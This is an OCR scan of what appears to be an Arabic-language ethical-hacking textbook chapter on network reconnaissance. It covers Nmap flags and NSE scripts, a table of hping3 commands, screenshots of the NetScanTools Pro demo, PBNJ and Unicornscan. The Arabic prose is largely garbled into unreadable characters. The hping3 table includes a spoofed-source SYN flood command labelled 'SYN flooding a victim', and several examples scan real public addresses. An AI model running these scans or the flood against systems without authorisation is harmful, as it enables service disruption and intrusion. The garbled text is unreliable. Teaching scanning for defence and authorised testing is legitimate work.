Probe Packet {FIN/U RG/PSH/N ULL) 



RST/ACK 

Port is closed 

FIGURE 3.BS: Inverse TCP Flag Scanning when Port as Closed 




Target Host 




Joe 



Target Host 



ACK Flag Scanning ■ 

(Ji ACK TCP J^j) & m j^Vl liA ^ .^U j^ll TCP ^ stealthy technique & 

^,^13 j£*j Ajjjjll £>i& ~\ ikiLujl j ^jj c^^j RST ^ TCP c^^ 3 L ^j^j ^2 o*j \) lt }^ L 

£lx»U^)J ^ J%^J f ' J-*1Lg ^ - ga^jj Ifllall jl£ lil Ai^stxaj ^£jU3l jl^l^Jl j^l jS L_flLuu£l L_J jLujVI li& ^ laJLudJ 1^)^.1 <^*-Af jl 

^ill >UJ! f jii^ cillil ACK l>-Jj SYN ^ ^ Jl^iVla ^LU j^i tiA jSYN c> ACK ^ jj c> ^> jWNmap 
^1 c_j jLjVi liA ji ^JxJI . (filtered)j^ iiiJI ^ j ^1 ^ Jj^j jl^ lil Ui RST ^ jj 

: jjjSjjJaj A\\\"\\\ d^A f IjI ^jj 

TTL field analysis 
- WINDOW field analysis 
JjuoLoaj ±±c ACK J^jj t^Laj .TCP ^ c> ^ c^ill ^Uajl! ^aj ^j^j j^-oj -uli j TTL ^l.^ nub 
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No Firewall 

Probe Packet (ACK) 

RST 



Stateful Firewall is Present 

Pigbe Packet |ACK) ^ 



Attacker 



Target Host 



Attacker 



No Response 



Target Host 



The Nmap Scripting Engine (NSE): From Caterpillar to Butterfly ■ 

<c a ^Nmap NSE ul^ '^^ . ^j*^ * cJ^ Cy* ^-^^ 't^j^ 42 j>» 4_^jjaU 5 4_ii&j stal Nmap 
^> o^ ^-im^ ^jjj ^ill Nmap J] The Nmap Scripting Engine (NSE).^ s^paJI cjI jl^Jl 

U Jl Ajlj^a j 4ijUa j J j^J Jll AjIloj^I ftbVl Jl 5iUiaj NSE.^W^ t> <*^Ij *I^V 4-la^ull CjIjjIujVI 

Nmap NSE '^j^ ^ Uiic. .Nmap s^&^l t^-^l <J j^^N a-ia&VI ^iL NSE o* s^iiujVI ^Isu 

' (backdoors) jj-^ t 4<Lga£Lg <Ljaj a£l±A l-aLou^Ij ^ a«jja]| Jataj (j^a^a tdli J Loj ^1^<JI ^ <c j±Lg <c a <JL*£V 

gaili £Lx»l^)i3l AiLjal ^JJ Cilia jlii-aj |«ia. ^JajuU <C a <^Jk NSE a ((jjljS^VI 4_lLaC S-l^)^-] iVl^Jl (J^H J 

,c*L <j-aUJI JaxJI A£jUl<i Jc A*yv& Uli (jl^J NSE c_u£ lil , jIj^Uj s^j^JI cjIj^I j 

'(auth)43^^ aJUJI cjUill Jxu^i j .Ajall L-Laia (script) 4_l^]| ^1 Jl ^ . uL NSE t^K^I *L^Vl Jc iaU^JI J^l ^ 
4 (external)c^ '(exploit) t(Dos)o , j^ '(discovery) ^t£&VI '(default) ^^J^^ 'brute 'broadcast 

^ l£ .(vuln) L-LuJall JalSjj '(version) J^VI '(safe) o*VI '(malware)^^* cjU*^ Jlj '(intrusive) 'fuzzer 

Aj3 jl ^.1 j > .Vi £c^U^)j (JjxjujJ ^jI jlkVI jSjf^ A J' 4i^l J^l U^^k U T ^ '^f^ 3 J C5^J^ C5^^ ^d-O^ C-H 3 J> ^ ^ L>^ ^'^^ lS 
lia ^-^l^luil jl til^lc^Jjojl (JjS (script) 4 J> djliUl j Aj3 ^JjIj jll 4jt^.l^ ^<J1 .(S^AxIg ^j^a jj^J ^ > ^aJJ j) <Lil^ 

l^Ull ^jjjll ^ NSE jjilsJI sj .^^a 

http://nmap.org/nsedoc 

. JliajSll [locate *.nse] j^VI ^iJilyil Jjjla ^ NSE CJ^i ^4 

olj^l (j^fft LftS t jp ^jj jjcj CiiJj£jajVl ^jojI jl Ajill "— SCript" J^f^i P laJLudJ ^jaifl 'NSE ^Ic-^Loil cj^-' 



#nmap©--script©banner©192.168.18.132 



cJ^Jl ^Uajll ^ Jjoj^ ^Ij^j c^l t^jj TCP J! Jl^-ajl lU»^ c^ill Nmap jk "banner" ^j^-VI 

>U^l J Ia£ [--script category name] ^I^jLuAj djUj^jaaVl <Lil£ ajs jl <^jIS ^Ic^IojI 1 v^^j JloL^j 
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%Ac jSjj Ajill £>i& .t^^Jl ^Uaill Jc Aij^stxJl (JjLoixJI J lLi^jj J^ij CjUj£jujV1 (j-a AioiLoj Jj*jujj Jc j-dju l_s jjoj "vuln" u) 
/ flajJall Jalij (j-a^i Jc; Ulj^aJ Sjlla^ 4^^Li NSE 'Vuln" j / flxjJall L-flluijSl Ale iaia ^Ij^VI 

I Jlia jSlI J ^lillujb <iL^ ^J^VI CjUIaj 4*ualiJ) CjUUJI dJPli du^j dlLoj 



#nmap©— script-updatedb 



( 45 jiSfl cjUjIIaVI c>a*j) Port Scanning Wrap Up 



/j^ ciSjLp J tiS a J till S iia a (Jj^j Jll <xjuj j>» 

version scanning (-sV) -1 
Nmap '(Version scan) j-oai ^1 j^l ^ . jl^aVI o-^ 1 ^ "-sV" j^i^ ^l^ki^l ^ 4 JjU^i CjSj J j£i L£ 

^ajL L_a jjoj i\ '&*\a tilli (Jj^j LoAic _^iL<JI 11a ^Akjjaaj jll J Saa^o CjLq jls^ Jj.^M jl^-o J 4-^. jliixJI ial_L<J3 CjLoi^q 

(j-o _cijUa^.^L<JI J CjUi jlx-<JI (Jj^ > oj jujjj .c5^)^-VI CjUi jls^ aj! j jIaj^I ^Isjl J Laj ^Lg^JI <J ja. (Jj > <al 9j ^jA5j j^ Nmap 
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<jt (j^xuJl ^ 4£jJa3l ^jjjoba ^jV jla JjisJl jl J;iiJl iallftll Jc 4_j^aLkj t L&a^ tdli <jl£ LaK "-sV iklujl (jjuoaJjuixJl 

^ILkV <J jU^» J 34567 <-^jlt IjVqVn 

Timing Templates -2 

^jl jjj (Timing switch) j^l 6^ ."-T" j^*^ ^ ^ iflli<JI j^a <c j^il jU^ Nmap t > > ^*l: 

.aJL^U Isuj Ajliil ft^Lft UJ^ O^** J-*^ ^J^^ -^J^ 6 5j C-H^^ AjLaO Uajl (jj^J 0 '5 Jl 0 L>* L^-^- (J^j J 
^^iiijJaxJl (j-a J' ^—^ L>* S^J^-a 4ju& <^1}-^ UJ^ ^•^C .liLa (jj^J (J I (j^J £_JJjuJI ^aaill \ ajjJ ( ftju^ll < . uaol .liLa g. Jaill 

.(-T3) (j ^^^ l <cjjuJ ^^jJaljjaVI ^-^jll .4ib JSl Nmap j 'o^* o-* 1 ^ ^j^l *i > n l ^ J^ uj^ u' C5^J^ 

fingerprinting the operating system -3 

^»Uaj jaJ jJ ^1 jl 1 jjAiij j& L_fl^Jl <jl£ lil La lj l^j] .^ixjuliII ^»Uaj <j^aa*A3 S^llLo <Jj£2 (J' clA^ ""O" JJJ* ^ 

(J-g jjx-<Jl L_a*jJa3! Jalij Jc CjLa^JI (ill ^-LgjoJI (J^Ja (jC dlfl jll (ill J^jJ <j^LuJj (j-a JjiXjuLill ^aUaj Aijx-G .JjiXjuLill 

. jj^JJj <»Uaij ci^S ^ (J-alaJl L_fl^Jl <jl£ b] (JJJ^iJ JjxjuiiII ^Uail 4j^abk]| L_a*_jJall latai! ^hViml ^JJ V .^Uaill 

Selecting Ports -4 

_(-p«) ^Vl^ (jjfLj j-aVI J- ^lAaJLujLj iaLL<JI ^ia^. ^ ^ .u^^^l ^ (-p) jjjt^l ^1.^1 mU q\ (j^j ial_L<JI 

. ^ Jj^al jail J Iklualj SJ^aII iaUxJl ^J^J l^ajl clA^J 



#nmap©-sS©-p©l-100 

#nmap©-sU©-p©53,137,138,161,162 

#nmap©-sS©-p©l-100,445,8000-9000 



Output Options -5 
[-oN Normal Output] 

I^Vl^ Aj3 ^cjUII Jaia. j txt ^1 J^Jl I^A c£^jJ ( s jjuj 



#nmap©-oN©metascan.txt©10.0.2.100 



[-oX (XML) Output] - 

I^Vl^ c5 J^VI CjllnJajll ^ ^jAslSI 4_LjujI jj 4^l^klujV ^Hij <^ £uU3l -lafl^j XIIll L ^UIjI ^1 jl_ik]| liA c^^jJ ^ j^j 



#nmap©-oX©metascan.xml©10.0.2.100 



[-oG GREPable Output] - 

DIFFj SEDj AWK 



#nmap©-oG©metascan.txt©10.0.2.100 



[-oS Script Kiddie Output] 

.SjJia^JI daL^a jai3l ^lj^.V ^ iklLujJ ^jl ^gSUh V ^-Ij^VI L-3 jLojVI I^A 



#nmap©-oS©metascan.txt©10.0.2.100 



SCANNING TOOL: HPING2/HPING3 



http ://www.hping.org : j^-a^ll 

Sj^lS sbVI . TCP/IP^* JjUl j cA^li^a t^-LA^j SjjlS Jj^Jall ^Ikil j^l jVl jia^ sbl ^ Sjbc- Hping2/Hping3 
t> ^ tdjSxj jTraceroute mode 6 ^ j^j IP <ICMP ^udp « TCPc> l£ ^ lUI*^I ^ 

:SbVI ai* cj! ^aI ^SJlj .^j>^l ^jI jjSSI u^? cjULJI JL^jj 

# 4jjU3I ^jlj^Jl ^ijl j3j ^cljS (j^a^a 

(Type of service ^>^t TOS'^J^ e 1 ^^ e> ^VA&jjj J^*^j c> ^bl o-a^i - 

. fragmentation^>J> ^ j^j 
(MTU= maximum transmission unit) (Path MTU discovery) ^ MTU -Jl ^ <a 
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.<*je.ia]l j$ jj jjJI (^ic traceroute lW- 
Remote OS fingerprinting^ <a^iouJI ^Ic Jji^l ^Jki t_iL££i 

TCP/IP stacks auditingc^ ^ J TCP/IP -II u*a£- - 

Hping2/Hping3 <>u u£ 



#hping3©172.16.0.10©-S©-c©l©-p©22 



. SYNW ^ ja -S JjVl jMJI 

.(o^JjJ ^ill ^AslSI JLojjV) -laaa j JLojjU ^ jlj c ^£3 j& 1 £>AsUj -c cs-^ 

.22 JL^jVI ^jjj c^ill ^j^j] j*-p C-iO j^Ji 



Scan 


Commands 


ICMPping 


hping3 -1 10.0.0.25 


i 

ACK scan on port SO 


hping3 -A 10.0.0.25 -p 80 


UDP scan on port 80 


hping3 -2 10.0.0.25 -p 80 


Collecting initial sequence number 


hping3 192.168.1.103 -Q -p 139 -s 


Firewalls and time stamps 


hping3 -S 72.14.207.99 -p 80 --tcp- 
timestamp 


SYN scan on port 50-60 


hping3 -8 50-56 -S 10.0.0.25 -V 


FIN, PUSH and URG scan on port 80 


hping3 -F -p -U 10.0.0.25 -p 80 1 


Scan entire subnet for live host 


hping3 -1 10.0.1.x --rand-dest -I ethO 


Intercept all traffic containing HTTP 
signature 


hping3 -9 HTTP -I ethO 1 


SYN flooding a victim 


hping3 -S 192.168.1.1 -a 192.168.1.254 
-p 22 — flood 



SCANNING TOOL: NETSCAN TOOLS PRO 



http ://www.netscantools.com : j^-a^ll 
tdi^JI i (monitor)^ j '(troubleshoot)U^-^ 1 j> *Uaa>Vl ^iLSfiLAj t*U a{ $j*<*\\\ sbl yt> NetScan Tools Pro 

tialixJI tip u^j^- tdu^luVI ^ o laJLui^ t^la A\ LAN <J jU» jLlxJI <j& l 

.local computer j DNSj passive jActive t^Uaj :LkJjj cjIj^Vi < ^ . utilities j iS^il! 
4£j^JU Jaiijj ^| s j^Vl j jU&J ^ f^^j : Active Discovery and Diagnostic Tools -1 
m 4j&!i t_fll jJal cjU jlx-<J! ( j r A^j Liajl j 4<^L a \ , ^\ a \ \ ftj^VI 4_k*ij| a^jj :Passive Discovery Tools -2 

.DNS ^ JSU^ll ^UaSV :DNS Tools -3 
.4? y?^^ j^ 1 ^ J J^tisll : Local Computer and General Information Tools -4 

sj^i ^^ic c ajl la jll Aj^aj j CjULiJI (jfl^i J- <ij ^ j ^^j^l JaLuij (j^ai 4jUr> c _^a (a£jJo3I ^j^i^^ Network scanning 
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: as^1\ Js* cjUajaiJ) ^ NetScan Tool Pro 
a£jj^3I s j Monitoring 

_cjtjjjJ!/ia\_L<J! ^a^a j jJI ^1 j ^jj^jja^H ^1 j ip ^jjjUc Ai^x^ Notifies 



;4_JU3l <jujLuJI ^JaJS l^JC- ft^st^Jl ^^ic -laxjJall (JJ^la (jC l^-La ujJ ^aJ tgJ (j^aLkJl wizard ^ *I^VI ClllinJ j£j 



y I dfc -^l I & I j 



demo - NetScanTools® Pro Demo Version Build 11-7-2013 based on version 11.53 



Click here to Buy Now! 



ED 



Ch e ck f o r N ew Ve rs i o n 



Vdu 



Blog/Twitter/FE 




Automated Tools 



Manual Tools [all) 



Favorite Tools 



Active Discovery Tools 



Pa s s ive D i s cove ry To o I s 



Packet Level Tools 



External Tools 



Program Info 



Welcome to NetScanTools 3 Pro ^ 



Welcome to NetScanTools® Pro Demo Version 1 1 . This software is a demo, all the tools are 1 C'D% function except you cannot save results to a text 
File, the History Database does not retain data between sessions and the source IP in Packet Generator must be your interface IP. 
This demo cannot be converted to a full version. 

Please select from the Automated or Manual tools or tools grouped by function on the left panel. 

Red icon tools contact the target, green icon tools listen to network traffic. 

blue icon tools work with your local system, and gray icon tools contact third party systems. 

Press the F1 key to view the extensive local help including Getting Started Information. 



For Help, press F1 



CA.PI NUMI SCRLI 



(Sj^ jj<s-k ^ (J^ji *-« ARP Ping W 1 " o*$l s^M 1 ^ Manual Tools -2 

i^VIS ok iai^ fS ARP Ping cp- cjUjkJI 




demo - NetScanTools® Pro Demo Version Build 1 1 -7-201 3 based on version 1 1 .53 



A few words about this tool... 



About the ARP Ping Tool 

Use this tool to 'PING' an IPv4 address on your subnet using ARP packets. Use it on your 
LAN to find the response time of a device to an ARP_REQUEST packet even if the device is hidden 
and does not respond to regular Ping. 

ARP Ping requires a target IPv4 address on your LAN - why? because ARP packets cannot be 
routed. 

Don't miss this special feature in this tool: Identify duplicate IPv4 address by 'pinging' a specific 
IPv4 address. If more than one device (two or more MAC addresses] responds, you are shown the 
MAC address of each of the devices. 

Press Show Timing Chart to see a printable chart of ARP ping number vs time. 
Don't forget to right click in the results for a menu with more options. 



Demo Limitations. 
■ None. 



orris to NetScanTools 3 Pro ^ 



cannot save results to c 
Tterface IP. 



Program Info 



fS Target IPv4 Address ^Jl <J IP u 1 ^ <-l^ £ Send Broadcast ARP, then Unicast ARP -3 

Send Arp 
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demo - NetScanTools® Pro Demo Version Build 11-7-2013 based on version 11.53 



: File Edit Accessibility Vie 



I & -Ln I ijj I fll 

Welcome 



Automated Tools 



Manual Tools (all) 



ARP Ping 




ARP 5 can (MAC Scan) 



Cache Forensics 



Favorite Tools 



Active Discovery Tools 



Pa s s ive □ i s cove ry To o I s 



Packet Level Tools 



External Tools 



Program Info 



Click here to Buy Now! 



Manual Tools - ARP Ping ^ 



Use ARP Packets to Ping 
an IPv4 address on your 
subnet. 

[FV4Q 



Send Broadcast ARP r then Unicast ARP I 



O Send Broadcast ARP Only 

Search for Duplicate IP Addresses 



Target IPv4 Address 



192 . 163 



16 



Send Arp 



Number to Send 



CydeTime ^ms) 



WinPcap Interface IP 



192. 163. 16.70 



Show Timing Chart 



Jump To Duplicate IP Scanner 



Duplicates Src IP 
* 0.0.0.0 
O IfF IP Addr 



J 



Jump To Automated 
Reports. 
I I Add to Favorites 



IF Address 
192 . 16B . 16. 71 
192 . 160 . 16 . 71 
192 . 166 .16.71 
192 . 16B . 16 . 71 
192 . 168 . 16 . 71 
192 . 16S . 16 . 71 
192 . 16S . 16 . 71 
192 . 16S . 16. 71 
192 . 16S . 16 . 71 
192 . 16S . 16 . 71 
192 . 16S . 16 . 71 
192.16S.16 . 71 
192 . 16S . 16 . 71 



MAC Address 

□Q-30-67-0F-AF- 

□Q-30-67-0F-AF- 

QQ-30-67-0F-AF- 

00-30-67-OF-AF- 

Q0-30-67-0F-AF- 

00-30-67-OF-AF- 

00-30-67-OF-AF- 

QQ-30-67-0F-AF- 

QQ-30-67-0F-AF- 

QQ-30-67-0F-AF- 

QQ-30-67-0F-AF- 

00-30-67-OF-AF- 

00-30-67-OF-AF- 



Response Tiine (msec J 

0.003593 

Q.Q03030 

0.003593 

0.0030S0 

0.0030S0 

0.003593 

0.003593 

0.002566 

0.004106 

0.003593 

0.003593 

0.0030S0 

0.Q030S0 



lype 

Broadcast 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 

Unica3t 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 



ok J»i^3 ia^llS ^kj^ ARP Scan (MAC Scan) Jc- ii^ -4 



J I ji -in l& I i§B I 



Automated Tools 



Manual Tools (all) 



demo - NetScanTools® Pro Demo Version Build 1 1-7-2013 based on version 1 1.53 
A few words about this tool... 



ARP Cache 



ARP 5 can (MAC 5 can] 



Cache Forensics 



Favorite Tools 



Active Discovery Tools 



Passive Discovery Tool; 



DNS Tools 



Packet Level Tools 



External Tools 



Program Info 



About the ARP Scan Tool 

■ Use this tool to send an ARP Request to every IPv4 address on your LAN. IPv4 connected 
devices CBnnot hide f ro m ARP packets and must respond with their IP and MAC addresses. 

■ Uncheck the Resolve IPs box for faster scan completion time. 

■ Don't forget to right click in the results for a menu with more options. 

Demo Limitations. 
- Hone. 



Manual Tools - ARP Ping ^ 



□ 
□ 



Type 

Broadcast 

Unicast 

Unicast 

Unicast 

Uni cast 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 

Unicast 



.Do Arp Scan Vii > ?Vi £ Ending IPv4 Address ^ *4&j Starting IPv4 Address IP £^ -5 
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OK 1« i >>\ f!> <^ l$ j^Vl ^ j$Ja5a DHCP Server Discovery k» > -6 




Automated Tools 



Manual Tools [all) 



Connection Monitor 



DHCP Server Discovery 



DNS Tools - Core 



Favorite Tools 



Active Discovery Tools 



Passive Discovery Tools 



DNS Tools 



Packet Level Tools 



External Tools 



Program Info 



demo - NetScanTools® Pro Demo Version Build 1 1 -7-201 3 based on version 1 1 .53 



A few words about this tool.. 



About the DHCP Server Discovery Tool 

■ Use this tool to actively locate DHCP servers [IPv-4 only) on your local network. It shows 
the IP add re ee and other setting e are being handed out by DHCP servers. This tool can also find 
unknown or 'rogue' DHCP servers. 

■ Don't forget to right click in the results for a menu with more options. 

Demo limitations. 
• Hone. 



an (MAC Scan) ^ 



rial Co. 



I 



\<JN\£ Discover DHCP server jj 1» > ^ 5^ J^- ^ > ^ -7 



demo - NetScanTools® Pro Demo Version Build 11-7-2013 based on version 11.53 



\ File Edit Accessibility View IPv6 Help 



Automated Tools 



Manual Tools (all) 



Connection Monitor 



Country to IP or ASN 



DHCP Server Discovery 



a 



DNS Tools - Core 
Favorite Tools 



Active D i s cove ry To o I s 



Passive Discovery Tools 



Packet Level Tools 



External Tools 



Program Info 



For Help, press F1 



Click here to Buy Now! 



Manual Tools - DHCP Server Discovery ^ 



Find DHCP Servers on your IPv4 subnet. 
For Help r press Fl 



Double -dick on Interface below or single -dick 
and press Discover 



[p,n C5 Jum P To Automated 
Reports 
I I Add to Favorites 



Discover DHCP Servers 



Stop 



Wait Time £sec) 
5 



EZ]| 



IPv4 Address 


ItAC Address 






Interlace Description 




0.0.0.0 


00-16-EA-DA- 


30 


-B9 


Micros eft fic3ted Network Virtual Adapter 




0.0.0.0 


00-FF-75-41- 


:L 


-AO 


TAF-KindQwa Adapter V9 




0.0.0.0 


00-21-36-AE- 


17 


-OA 


Elue teeth Device (Perse rial Area Netwcrt) 




192.16S.16.70 


00-1E-EC-AF- 


FE 


-65 


Realtek PCIe GBR Faiii 1 y Controller 





Discover Options 



Responding DHCP Servers 



0 Hostname 
0 Subnet Mask 
0 Domain Name 
0 DNS IP 
0 Router IP 
0 NTP Servers 



Server IP Server Hostname Server HAC Address Offered IF 
192. 16S. 16.1 tc 192.16S.16.73 


Offered Subnet 
255 . 255.255.0 







































I 



I 



icPVIS ok k» > rV* j^ia oajVi s^Mi c> port scanner -8 

. ■ ■ _ ■ * i- t. j" _— _ . . n...;i^i 1. t -r n, ■ i , . = -i i I » I 



demo - NetScanTools® Pro Demo Version Build 11-7-2D13 based on version 11.53 



Welcome 



Automated Tools 



Manual Tools (all] 



Po rt S ca n n e i 



Promiscuous Mode Sc 



Real Time Blacklist Check 



- - Z Reference Li or; 



Favorite Tools 



Active Discovery Tools 



Passive Discovery Tools 



DNS Tools 



Packet Level Tools 



Program Info 



Click here to Buy Now! 



Manual Tools - Port Scanner '-^ 



Target Hostname or IP Addre 



Port Range and Scan Mode 

<$> TCP Full Connect 



I I Use Target List When i 
For Help r press F 1 

Scan Range of Ports 
Scan Common Ports 
Edit Common Ports List 
Edit "Target List 
Stop 



Start 
End 



I I Show All Scanned Ports, Actjv 



^| CJ UDP Ports Only 
— G TCP Full+UDP Ports 
_| O TCP SVN Scan (Half Open) 
(O TCP Custom Scan 

* Show "TCP Summary C3 



Add Note 



I I Add to Favoi 
Show UDP Summary 



WinPcap Interface IP 

192. iss. is. yo **> 



t Timeout 
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SCSI! RRng6 1 <aJ ^a^ill 1 * ^ I^JLujJ <jl Ajjj ^^jII 4_x»^Jl ^ ^ <J (j^aLkJl IP <jl jjc jl L_flJjJaxJl ^jojI -9 



demo - NetScanTools® Pro Demo Version Build 1 1-7-2013 based on version 11.53 



\ File Edit Accessibility View IPv6 Help 



i A I & ^ l&I ©I # 



Automated Tools 



Manual Tools (all) 



Port Scanner 



Promiscuous Mode Scanner 



Real Time Blacklist Check 



RFC Reference Library 

Favorite Tools 



Active Discovery Tools 



Passive Discovery Tools 



Packet Level Tools 



External Tools 



Program Info 



Click here to Buy Now! 



Manual Tools - Port Scanner ^ 



Target Hostname or IP Address 



.'ww. google, com 



□ 



I I Use Target List When Scanning 
Scan Complete - 256 ports scanned in 5 sec 

Scan Range of Ports | EH Show All Scanned Ports,. Active or Not 



Port Range and Scan Mode 

® TCP Full Connect ipvaO 
Start | 1 ~^ O UDP Ports Only [pvf, ° 

O TCP Full +UDP Ports 
End | 256 | O TCP SYN Scan {Half Open) 

O "TCP Custom Scan 



Add Note 



Jump To Automated 



Reports 



I Show TCP Summary 
TCP Full Connect Response Summary 




I I Add to Favorites 
Show UDP Summary 



I 1: Aritive TCP Ports, 2 

I 2: Active TCP Ports Returning Data r 0 

I 3: TCP Ports Rejecting Connection,. 0 

I 4: No Response - Timeout 254 



Connect Timeout 
I 2000 



"Si 
L3]| 



IP Address Port 
173.194.40.116 25 


Port Deac 
smtp 


PrDtQCOl 

TCP 


Results Data Received 
Fcrt Active 


173.194.40.116 80 


http 


TCP 


Port Active 











For Help, press F1 



SCANNING TOOL: PBNJ 

MySQL c^j Nmap g-ft" J^?^ .MySQL **clS ^ j^j Nmap <j-a^i3l CjULc^ ^-taJt £Oj^ 

:V j! MySQL JjjL <> J^l 1^3 . ji£ 



>ot@jana :~# service mysql start 
[ ok ] Starting MySQL database server: mysqld .. 

[ ] Checking for tables which need an upgrade , are corrupt or were 

not closed cleanly.. 

: — # mysql -u root 
Welcome to the MySQL monitor. Commands end with ; or \g. 
Your MySQL connection id is 37 
Server version: 5.5.28-1 (Debian) 



Copyright ( c ) 2000 , 2012, Oracle and/or its affiliates. All rights reserved. 

Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 
owne rs . 



Type 'help; 1 or 1 \h 1 for help. Type 1 \c 
mysql > | 



to clear the current input statement 



-u j^ill mysql (J&j^ CP ^LSuV c*Ui aju service CP mysql J ^fo f 



mysql> 


CREATE DATABASE pt 






Query O 


K , 1 row affected 


(O.OO sec) 










mysql> 


exit 






Bye 










:~# | 







https://www.facebook.com/tibea2004 



40 



.U^j^ cAAaA\ s^IS £ CREATE DATABASE ^l^i^U PBNJ £A&# s^clS *L&L lioS jV! 

i^VlS PBNJ m jhcVl CjUL e j£ ^ [apt-get install pbnj] i> PBNJ ^ 



*t@jana:/# mkdir -p /root/ .pbnj -2 .0 
>ot@jana:/# cd /root/ .pbnj -2 .G 

la : ~/. pbnj -2 . 0# cp /us r/sha re/doc/pbnj /examples/mysql . yaml conf ig . yaml 
la :-/. pbnj -2. 0# nano config .yaml § 



# YAML : 1 .0 




# Config for connecting to a 


DBI database 


# SQLite, mysql etc 




db : mysql 




# for SQLite the name of the 


file. For mysql the name of the database 


database: pbnj 




# Username for the database. 


For SQLite no username is needed. 


user: root 




# Password for the database. 


For SQLite no password is needed. 


passwd : " " 




# Password for the database. 


For SQLite no host is needed. 


host : localhost 




# Port for the database. For 


SQLite no port is needed. 


port: 33G6| 





:<^Vl£ scanpbnj ^l^ki^U ping sweep lU*j uVI ^ 



ia : ~/. pbnj -2 . 0# scanpbnj -a 
Shell will be removed from the Perl 
-perl package. It is being used at j 


' -sP" 74.125.132.100-103 
core distribution in the nexi 
'us r/bin/scanpbnj , line 26. 


: major 


release. Please install the separate libshell 


Starting Scan of 74 . 125 . 132 . 100 
Inserting Machine 

Scan Complete for 74.125.132.100 








Starting Scan of 74 . 125 . 132 . 103 
Inserting Machine 

Scan Complete for 74.125.132.103 








Starting Scan of 74 . 125 . 132 . 101 
Inserting Machine 

Scan Complete for 74.125.132.101 








Starting Scan of 74.125.132.102 
Inserting Machine 

Scan Complete for 74 . 125 . 132 . 102 








@jana :-/. pbnj -2. 0# 









CjUUJI s^clS (^Ic £ MiL* ^j^^ ^ [mysql — u root] c^VI fl-vVi"il C&j^ cf- mysql l^Xk J I V ji 

i^VtS ^AjLJI %±zXk ^jojI use >*VI ^l^klujU ^^-^ <J& 



mysql > use pbnj ; 

Reading table information for completion of table and column names 
You can turn off this feature to get a quicker startup with -A 

Database changed 



I^VIS show tables; >*VI ^l^kiujU J jl^aJI <>» ^ £AjUJI s^lS ^ j±*u* ^ jai 
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JM* [select * from table_name] flJai-b scanpbnj >»VI £iU <_£j*-i 



mysql> select * from services; 
Empty set (G.QO sec) 

mysql> select * from machines; 

| mid | ip | host | localh | os | machine_c reated | created_on 



1 1 


74. 


.125, 


.132.1Q0 | 


wb 


-in-fl©0, 


.lel00.net | 


0 | 


unknown os 


| 1395648008 | 


Mon 


Mar 


24 


04: 


:00: 


:08 


2014 | 


2 | 


74. 


.125, 


.132.1G3 | 


wb 


-in-fl03, 


.lel00.net 


0 | 


unknown os 


| 1395648008 | 


Mon 


Mar 


24 


04: 


:00: 


:08 


2014 | 


3 1 


74. 


.125, 


.132.101 | 


wb 


-in-flQl, 


.lel00.net 


0 | 


unknown os 


| 1395648008 | 


Mon 


Mar 


24 


04: 


:00: 


:08 


2Q14 | 


4 | 


74. 


.125, 


.132.102 


wb 


-in-flQ2, 


.lel00.net 


0 | 


unknown os 


1395648008 


Mon 


Mar 


24 


04: 


:O0: 


:08 


2014 



4 rows in set (0.0© sec) 



.man CjL^iua ^hVn nb <jn«\$lt CjblaP ^ L^ajiH nt £)£jm]| (^a ^\ f jaJI g^LVt 

Jjaa A^Luab tiib ^jj j ; JjLuuJ) ^Uaj cjIjIa^J ^banner J^) Jl$^ Jj^ jIju^) ^j^l ^ ^ *\ .,\ ^aa1\ ^ 

a j±& JJLuu ^ at laJL ub ^-uaL V .CjbbJj dJ&l£ ^ <lua CjIj 



SCANNING TOOL: UNICORNSCAN 



^ ibUi^V! ^1^3 aSjiIa jj o^b3! ^jjjj J] cJ^j <jl .user-land distributed TCP/IP stack j* Unicornscan 

I^Vl^ CjIj^II ^ j>^* J*j£i ^1 j t^jill dj| CjUJI 4j^3 Liajl j .TCP/IP jl Sj^Vl 

^i^ki^b TCP ^ o-^) Asynchronous stateless TCP scanning with all variations of TCP flags - 

Asynchronous stateless TCP banner grabbing - 
(UDP iaLLa o-n^i) Asynchronous protocol-specific UDP scanning - 
jl o jj;b* ^ji^ c-i^Ji ^ jciisii *i ^liJdi ^u^ o-n^i ) Active and passive remote OS, application - 

(PCAP £A*£- PCAP file logging and filtering - 

(caAa, s^cis AijA ^ £i»n Relational database output - 

(4' ^^* ^) Custom module support - 

(cjUUJ! <> ^ ^ o ^n^i ^ ) Customized data set views - 

Unicornscan o£ J*' i3j^L? to^ o-^^ Unicornscan ^ 1^1 .o 1 ^ J^&ll 4> ^ > ^^ &bl ^ 
515* <>l jl* jjc. JSAj c>a ^i3l cill ^il tiA j .<j oaLk TCP/IP Stack ^3 Unicornscan <J Nmap ls j*>Vl £A*-aaAill j 

^I^U ^ .Unicornscan ^l^i^U (65,000 t> jKl IP u> ^) B ^ ^ HTTP ^ 

.Nmap J^J^ ^ .c3^^^ c> l$ ^AaxJI dIa ^ ^Unicornscan 

■PPP V & Unicornscan Aiajal^ 

^ .[apt-get install Unicornscan] 6^ Sl^t ^ 



:/# unicornscan 


173.194 


.44.84 






TCP open 


smtp 


[ 25] 


from 173.194.44.84 


ttl 52 




: # unicornscan 


173.194. 


44.84 






TCP open 


smtp[ 


25] 


from 173.194.44.84 


ttl 52 


TCP open 


http[ 


80] 


from 173.194.44.84 


ttl 45 


TCP open 


https[ 


443] 


from 173.194.44.84 


ttl 45 


: /# | 
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OTHER SCANNING TOOLS 



PRTG Network Monitor available at http ://www.paessler.com 

Net Tools available at http ://mabsof tcom 

IP Tools available at http ://www.ks-sof t.net 

MegaPing available at http ://www.magnetosof tcom 

Network Inventory Explorer available at http://www.10-strike.com 

Global Network Inventory Scanner available at http ://www.magnetosof t.com 

SoftPerfect Network Scanner available at http ://www.softperf ect.com 

Advanced Port Scanner available at http ://www.radmin.com 

Netifera available at http ://netif era.com 

Free Port Scanner available at http ://www.nsauditor.com 



DO NOT SCAN THESE IP ADDRESSES 



RANGE 1 26 

12B.37.0 O Afrnyt Yurna Proving Grourwl 
12B. 33.0.0 Nawof Surface YVarfara Canter 
I2fi.-*3.0-0 Defence FSesearch E staiot I snn len l -O flaws 
12E.47.C_a Atw ConTTTunic^iorts Eectronics Command 
12E 49 O O hiatal Ocean S^tems Center 
12S.50.CJ-0 Cfeptartn-ic=rTt of DcSrcrrac 
l2fi_5l .CO Departrnerrt erf Defense 
1S&.56.CLO U.S. NavaJ Academy 

125. eO.0_O Nawal Re^aorch La-boratory 
iza.^.O-Q Army asfitstics Fiesearcn L^borotory 

